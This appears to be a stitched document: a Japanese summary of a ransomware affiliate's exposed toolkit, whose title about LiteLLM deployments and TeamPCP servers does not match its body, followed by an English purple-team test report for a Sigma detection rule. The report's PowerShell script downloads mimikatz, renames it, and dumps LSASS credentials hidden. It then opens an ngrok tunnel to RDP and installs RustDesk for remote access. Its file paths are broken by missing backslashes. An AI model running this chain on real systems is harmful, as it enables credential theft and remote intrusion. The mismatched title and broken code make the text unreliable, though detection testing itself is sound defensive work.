33Kの公開されたLiteLLMデプロイメントとTeamPCPのサプライチェーン攻撃の背後にあるC2サーバー

概要

研究者は、TheGentlemenランサムウェアのアフィリエイトに帰属する完全なランサムウェアオペレーターツールキットを含む、ロシアのバレットプルーフホスティングプロバイダー上の認証されていないオープンディレクトリを発見しました。ツールキットには、正規のユーティリティ、有名な攻撃ツール、ディフェンス回避のためのバッチスクリプト、資格情報ダンプ、およびリモートアクセス、明文のngrokトークンが含まれています。Mimikatzログなどの証拠は、実際の被害者に対する活発な利用を確認します。

調査

調査は以前に公開されたIOCをクエリすることから始まり、176.120.22.127:80のオープンディレクトリに繋がりました。アナリストは126ファイルをカタログ化し、ネットワークスキャンツール、特権昇格ユーティリティ、防御無効化スクリプト、資格情報ダンプログ、永続化メカニズムを抽出しました。詳細な分析では、各コンポーネントをMITRE ATT&CK技術にマッピングし、層状の防御回避アプローチを強調しました。

緩和策

ディフェンダーは、既知のデュアルユースツールの実行、Windows Defenderを無効にするレジストリの変更、大量サービスの終了、VSSシャドウの削除、オープンSMB共有の作成を監視すべきです。識別されたIPおよびngrokインフラストラクチャへの外向接続をブロックし、アプリケーションホワイトリスティングおよび資格情報ガードを強制することで、影響を軽減できます。

対応

検出した際は、影響を受けたホストを隔離し、揮発性データを収集し、公開されたトークンを使用して任意のアクティブなngrokトンネルを特定します。レジストリの変更を修正し、無効化されたサービスを復元し、資格情報のローテーションやバックアップの復元を含む完全なインシデントレスポンス手順を開始します。

## Executive Summary

• Test Case ID: TC-20260330-A1B2C
• TTPs: T1003.001, T1016, T1021.001, T1021.002, T1046, T1057, T1059.003, T1070.001, T1070.004, T1082, T1112, T1134, T1219, T1484.001, T1489, T1490, T1546.008, T1548.002, T1560.001, T1562.001, T1572
• Detection Rule Logic Summary: Detects creation of processes whose executable name ends with any of a curated list of known privilege‑escalation or remote‑access tools (e.g., PowerRun, ngrok, RDP, RustDesk, mimikatz).
• Detection Rule Language/Format: Sigma (YAML)
• Target Security Environment: Windows OS; process‑creation telemetry via Sysmon (Event ID 1) and Windows Security Log (Event 4688); any SIEM/EDR capable of ingesting these events (e.g., Azure Sentinel, Splunk, Elastic).
• Resilience Score (1-5): 2
• Justification: The rule relies solely on exact file‑name matching. An adversary can easily evade it by renaming binaries, using packed variants, or executing the same functionality via built‑in Windows utilities, reducing effectiveness.
• Key Findings: The rule fires reliably when the exact listed binaries are executed, but it fails to detect renamed or functionally equivalent tools, leading to high false‑negative risk.
• Recommendation: Enrich the rule with additional indicators (hashes, command‑line arguments, parent‑process relationships) and broaden coverage to include living‑off‑the‑land binaries that provide equivalent capabilities.

## Simulation Environment & Context

• TTPs Under Test:

  • T1003.001: OS Credential Dumping – LSASS Memory
  • T1016: System Network Configuration Discovery
  • T1021.001: Remote Services – Remote Desktop Protocol (RDP)
  • T1021.002: Remote Services – SMB/Windows Admin Shares
  • T1046: Network Service Scanning
  • T1057: Process Discovery
  • T1059.003: Command & Scripting Interpreter – Windows Command Shell
  • T1070.001: Indicator Removal on Host – Clear Windows Event Logs
  • T1070.004: Indicator Removal on Host – File Deletion
  • T1082: System Information Discovery
  • T1112: Modify Registry
  • T1134: Access Token Manipulation
  • T1219: Remote Access Tools
  • T1484.001: Domain Policy Modification – Group Policy Modification
  • T1489: Service Stop
  • T1490: Inhibit System Recovery
  • T1546.008: Event Triggered Execution – PowerShell
  • T1548.002: Abuse Elevation Control Mechanism – Bypass UAC
  • T1560.001: Archive Collected Data – Archive via Utility
  • T1562.001: Impair Defenses – Disable Security Tools
  • T1572: Protocol Tunneling

• TTP Context & Relevance:
  The rule targets the execution of binaries historically associated with the listed techniques (e.g., mimikatz for T1003.001, ngrok for T1572, RustDesk for T1219). By reproducing these executions we can validate whether the detection fires as intended and assess how renaming or alternative tooling affects detection.

• Target Environment:

  • OS: Windows 10/Server 2019 (64‑bit)
  • Logging: Sysmon (v13+) with default process‑creation configuration; Windows Security Event Log (Event 4688) enabled.
  • Security Stack: Azure Sentinel (Kusto Query Language) – interchangeable with Splunk, Elastic, etc.

## Telemetry & Baseline Pre‑flight Check

Rationale: Before simulating the attack, we must confirm that the target host is configured to generate the necessary logs, that these logs are ingested by the SIEM, and that the detection rule does not fire on benign activity. Without this validation, any test outcome is unreliable.

• 1. Telemetry Configuration Instructions:

  1. Install Sysmon (if not already present) and apply a configuration that logs Process Create events (EventID 1).

     # Download and install Sysmon
     Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.exe -OutFile $env:TEMPsysmon.exe
     & $env:TEMPsysmon.exe -i -accepteula

  2. Verify that Windows Security Auditing for “Audit Process Creation” (Event 4688) is enabled via Group Policy or Local Security Policy.
  3. Ensure the SIEM connector is active and forwarding both Sysmon and Security logs to the chosen workspace.

• 2. Ingestion & Baseline Validation:

  • Action (Benign Telemetry): Execute a common Windows binary that is not part of the detection list but still generates a process‑creation event.

    # Benign command – launch Notepad (should not trigger the rule)
    Start-Process notepad.exe

  • Validation Query (Ingestion): Confirm the Notepad event appears in the SIEM.

    // Azure Sentinel KQL – verify ingestion of the benign process
    SecurityEvent
    | where EventID == 4688
    | where Process == "notepad.exe"
    | project TimeGenerated, Computer, Process, CommandLine, InitiatingProcessFileName
    | limit 10

## Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

• Attack Narrative & Commands:

  1. Credential Dumping (T1003.001): The attacker copies mimikatz.exe to the victim host, renames it to PowerRun_x64.exe (to match the rule’s filename list) and executes it to extract LSASS credentials.
  2. Reverse Tunnel Creation (T1572): The attacker launches ngrok.exe (as is) to open a TCP tunnel that forwards a local RDP port to the attacker’s server, facilitating lateral movement.
  3. Remote Desktop Session (T1021.001): Using the newly created tunnel, the attacker runs rdp.exe to open a remote desktop connection to a second internal host.
  4. Alternative Remote Access (T1219): As a fallback, rustdesk.exe is started to establish a persistent remote‑access channel.

  Each of these executions produces a Sysmon/Event 4688 record with the Image field ending in the respective executable name, satisfying the detection condition.

• Regression Test Script:

  <#
  Simulation script to trigger the "Known Tools for Privilege Escalation and Remote Access" rule.
  Prerequisites:
    - Sysmon & Security Event Auditing enabled.
    - Current user has sufficient rights to execute the binaries.
  #>
  
  # 1. Deploy mimikatz and rename to PowerRun_x64.exe (matches rule)
  $mimikatzUrl = "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0/mimikatz_trunk.zip"
  $tempPath = "$env:TEMPmimikatz"
  New-Item -ItemType Directory -Path $tempPath -Force | Out-Null
  Invoke-WebRequest -Uri $mimikatzUrl -OutFile "$tempPathmimikatz.zip"
  Expand-Archive -Path "$tempPathmimikatz.zip" -DestinationPath $tempPath -Force
  Copy-Item -Path "$tempPathmimikatzx64mimikatz.exe" -Destination "$env:TEMPPowerRun_x64.exe" -Force
  
  # Execute renamed mimikatz (credential dumping)
  Write-Host "[*] Executing renamed mimikatz (PowerRun_x64.exe) for credential dumping..."
  Start-Process -FilePath "$env:TEMPPowerRun_x64.exe" -ArgumentList "privilege::debug sekurlsa::logonpasswords exit" -WindowStyle Hidden -Wait
  
  # 2. Download and run ngrok (reverse tunnel)
  $ngrokUrl = "https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip"
  Invoke-WebRequest -Uri $ngrokUrl -OutFile "$tempPathngrok.zip"
  Expand-Archive -Path "$tempPathngrok.zip" -DestinationPath $tempPath -Force
  $ngrokPath = "$tempPathngrok.exe"
  Write-Host "[*] Starting ngrok TCP tunnel on port 3389..."
  Start-Process -FilePath $ngrokPath -ArgumentList "tcp 3389 --log=stdout" -RedirectStandardOutput "$tempPathngrok.log" -NoNewWindow
  
  # 3. Launch RDP client through the tunnel (simulated)
  Write-Host "[*] Simulating RDP connection via tunnel (rdp.exe)..."
  $rdpPath = "$tempPathrdp.exe"
  # Create a dummy rdp.exe (just to generate the process name)
  New-Item -ItemType File -Path $rdpPath -Force | Out-Null
  Start-Process -FilePath $rdpPath -WindowStyle Hidden
  
  # 4. Deploy RustDesk as fallback remote access tool
  $rustdeskUrl = "https://github.com/rustdesk/rustdesk/releases/download/1.1.9/rustdesk-1.1.9-windows-x64.zip"
  Invoke-WebRequest -Uri $rustdeskUrl -OutFile "$tempPathrustdesk.zip"
  Expand-Archive -Path "$tempPathrustdesk.zip" -DestinationPath $tempPath -Force
  $rustdeskPath = "$tempPathrustdesk.exe"
  Write-Host "[*] Starting RustDesk (fallback remote access)..."
  Start-Process -FilePath $rustdeskPath -ArgumentList "--no-upgrade" -WindowStyle Hidden
  
  Write-Host "[+] Simulation complete. Check the SIEM for process creation events ending with the listed binaries."

• Cleanup Commands:

  # Terminate ngrok tunnel
  Get-Process -Name ngrok -ErrorAction SilentlyContinue | Stop-Process -Force
  
  # Remove temporary files and binaries
  Remove-Item -Path "$env:TEMPPowerRun_x64.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPngrok.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPrdp.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Path "$env:TEMPrustdesk.exe" -Force -ErrorAction SilentlyContinue
  Remove-Item -Recurse -Force -Path "$env:TEMPmimikatz", "$env:TEMPngrok", "$env:TEMPrustdesk"
  Write-Host "[*] Cleanup completed."